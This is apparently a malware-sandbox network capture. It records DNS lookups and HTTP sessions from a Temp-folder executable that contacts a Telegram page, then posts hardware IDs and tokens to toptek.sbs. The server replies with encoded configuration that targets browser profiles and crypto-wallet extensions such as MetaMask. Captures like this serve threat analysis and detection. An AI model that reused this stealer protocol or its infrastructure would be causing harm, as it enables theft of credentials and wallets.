| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 22, 2024 22:47:03.501826048 CET | 192.168.2.4 | 1.1.1.1 | 0xeea2 | Standard query (0) | ezaZTimpWHt.ezaZTimpWHt | A (IP address) | IN (0x0001) | false |
| Dec 22, 2024 22:47:30.091262102 CET | 192.168.2.4 | 1.1.1.1 | 0xa0b8 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false |
| Dec 22, 2024 22:47:32.192471027 CET | 192.168.2.4 | 1.1.1.1 | 0x92b2 | Standard query (0) | toptek.sbs | A (IP address) | IN (0x0001) | false |
| Dec 22, 2024 22:47:48.084806919 CET | 192.168.2.4 | 1.1.1.1 | 0xd7fc | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Dec 22, 2024 22:47:48.085011959 CET | 192.168.2.4 | 1.1.1.1 | 0x8a64 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
DNS answers:

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 22, 2024 22:47:03.718823910 CET | 1.1.1.1 | 192.168.2.4 | 0xeea2 | Name error (3) | ezaZTimpWHt.ezaZTimpWHt | none | none | A (IP address) | IN (0x0001) | false |
| Dec 22, 2024 22:47:30.228945017 CET | 1.1.1.1 | 192.168.2.4 | 0xa0b8 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false |
| Dec 22, 2024 22:47:32.508272886 CET | 1.1.1.1 | 192.168.2.4 | 0x92b2 | No error (0) | toptek.sbs | | 94.130.188.57 | A (IP address) | IN (0x0001) | false |
| Dec 22, 2024 22:47:48.221848965 CET | 1.1.1.1 | 192.168.2.4 | 0xd7fc | No error (0) | www.google.com | | 142.250.181.68 | A (IP address) | IN (0x0001) | false |
| Dec 22, 2024 22:47:48.222336054 CET | 1.1.1.1 | 192.168.2.4 | 0x8a64 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false |
                                                                                                                                                                                                                                                                          • t.me
                                                                                                                                                                                                                                                                          • toptek.sbs
                                                                                                                                                                                                                                                                          • www.google.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49738 | 149.154.167.99 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com |

2024-12-22 21:47:31 UTC, 85 bytes transferred, direction OUT:
GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

2024-12-22 21:47:32 UTC, 512 bytes transferred, direction IN:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 22 Dec 2024 21:47:31 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12296
Connection: close
Set-Cookie: stel_ssid=f99b7526b9c8478abc_16618598629724549006; expires=Mon, 23 Dec 2024 21:47:31 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000

2024-12-22 21:47:32 UTC, 12296 bytes transferred, direction IN:
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49739 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com |

2024-12-22 21:47:34 UTC, 230 bytes transferred, direction OUT:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Connection: Keep-Alive
Cache-Control: no-cache

2024-12-22 21:47:35 UTC, 158 bytes transferred, direction IN:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:47:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2024-12-22 21:47:35 UTC, 5 bytes transferred, direction IN:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49740 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com |

2024-12-22 21:47:36 UTC, 322 bytes transferred, direction OUT:
POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CTJEC2VAAAAIE3W47YMG
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-22 21:47:36 UTC | 256 | OUT |
                                                                                                                                                                                                                                                                          Data Ascii: ------CTJEC2VAAAAIE3W47YMGContent-Disposition: form-data; name="hwid"20F59941837A2974164258-a33c7340-61ca------CTJEC2VAAAAIE3W47YMGContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------CTJEC2VAAAAIE3W47YMG--
2024-12-22 21:47:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:47:37 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|a45628d56513102ac81c4cf99122a512|1|1|1|1|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:38 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----379R1D2DTRQIEU37YU3O
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-22 21:47:38 UTC | 331 | OUT |
                                                                                                                                                                                                                                                                          Data Ascii: ------379R1D2DTRQIEU37YU3OContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------379R1D2DTRQIEU37YU3OContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------379R1D2DTRQIEU37YU3OCont
2024-12-22 21:47:39 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:39 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:47:39 UTC | 2192 | IN |
                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49742 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:41 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----N7GVKFKNOP8YUAIWTJEU
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-22 21:47:41 UTC | 331 | OUT |
                                                                                                                                                                                                                                                                          Data Ascii: ------N7GVKFKNOP8YUAIWTJEUContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------N7GVKFKNOP8YUAIWTJEUContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------N7GVKFKNOP8YUAIWTJEUCont
2024-12-22 21:47:41 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:41 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:47:41 UTC | 5837 | IN |
                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49743 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:43 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26XT0ZMGV3W4E3EUS2DT
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-22 21:47:43 UTC | 332 | OUT |
                                                                                                                                                                                                                                                                          Data Ascii: ------26XT0ZMGV3W4E3EUS2DTContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------26XT0ZMGV3W4E3EUS2DTContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26XT0ZMGV3W4E3EUS2DTCont
2024-12-22 21:47:44 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:47:44 UTC | 119 | IN |
                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:45 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KNG4EUSR1N7YUA16890R
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 6177
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-22 21:47:45 UTC | 6177 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------KNG4EUSR1N7YUA16890RContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------KNG4EUSR1N7YUA16890RContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------KNG4EUSR1N7YUA16890RCont
2024-12-22 21:47:46 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:46 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:47:46 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49745 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:46 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----LXLNGVKNGVAIE3OZMO8Y
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 489
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-22 21:47:46 UTC | 489 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------LXLNGVKNGVAIE3OZMO8YContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------LXLNGVKNGVAIE3OZMO8YContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LXLNGVKNGVAIE3OZMO8YCont
2024-12-22 21:47:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:47:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49751 | 142.250.181.68 | 443 | 1312 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:49 UTC | 607 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
2024-12-22 21:47:50 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:50 GMT
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-UmfMbYtUrw9slKJJ-mA09w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Data Ascii: zTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQkJRRUJBQUFBQUFBQUFBQUFBQUFGQVFNRUJnY0NBUC9FQURNUUFBSUJBd01DQXdRS0F3RUFBQUFBQUFFQ0F3QUVFUVVTSVRGUkUwRmhJakp4OEFZSEZDTlNnWk
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC1159INData Raw: 48 6f 77 62 46 70 79 62 57 68 33 63 47 46 4f 54 6c 6c 78 51 55 4a 43 54 54 52 34 61 6b 68 43 54 31 49 72 65 45 5a 47 59 6d 31 33 64 48 5a 43 54 7a 46 46 56 30 30 34 63 32 4e 56 51 54 41 72 4f 55 34 78 5a 45 4d 30 59 6d 46 48 64 56 6b 77 61 30 70 42 65 47 74 72 51 32 6c 57 4e 6a 68 70 4b 30 59 33 54 45 39 6f 55 45 39 43 62 6b 68 79 55 31 68 72 4e 6b 74 78 61 47 4a 54 65 55 55 34 59 33 46 53 55 6a 64 76 4f 46 70 43 4e 7a 67 31 62 33 4a 77 4d 58 52 68 61 46 4d 32 4e 31 4e 57 4e 48 67 79 54 6b 52 5a 54 6b 74 75 54 31 70 72 62 53 73 33 53 54 6c 76 54 45 39 31 51 30 39 50 54 33 5a 79 4b 7a 46 4f 56 48 70 32 57 54 4a 4f 4e 33 46 56 61 31 52 33 55 6e 68 58 4e 31 42 7a 59 6b 64 54 55 55 39 50 62 45 5a 4e 62 54 45 77 65 55 4d 35 4d 6d 30 76 64 58 70 49 4e 32 68 31
                                                                                                                                                                                                                                                                          Data Ascii: HowbFpybWh3cGFOTllxQUJCTTR4akhCT1IreEZGYm13dHZCTzFFV004c2NVQTArOU4xZEM0YmFHdVkwa0pBeGtrQ2lWNjhpK0Y3TE9oUE9CbkhyU1hrNktxaGJTeUU4Y3FSUjdvOFpCNzg1b3JwMXRhaFM2N1NWNHgyTkRZTktuT1prbSs3STlvTE91Q09PT3ZyKzFOVHp2WTJON3FVa1R3UnhXN1BzYkdTUU9PbEZNbTEweUM5Mm0vdXpIN2h1
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49752 | 142.250.181.68 | 443 | 1312 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:50 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49753 | 142.250.181.68 | 443 | 1312 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:47:50 UTC | 510 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-22 21:47:51 UTC | 1018 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Sun, 22 Dec 2024 21:47:50 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64 65 2c 50 64 2c 52 64 2c 57 64 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69
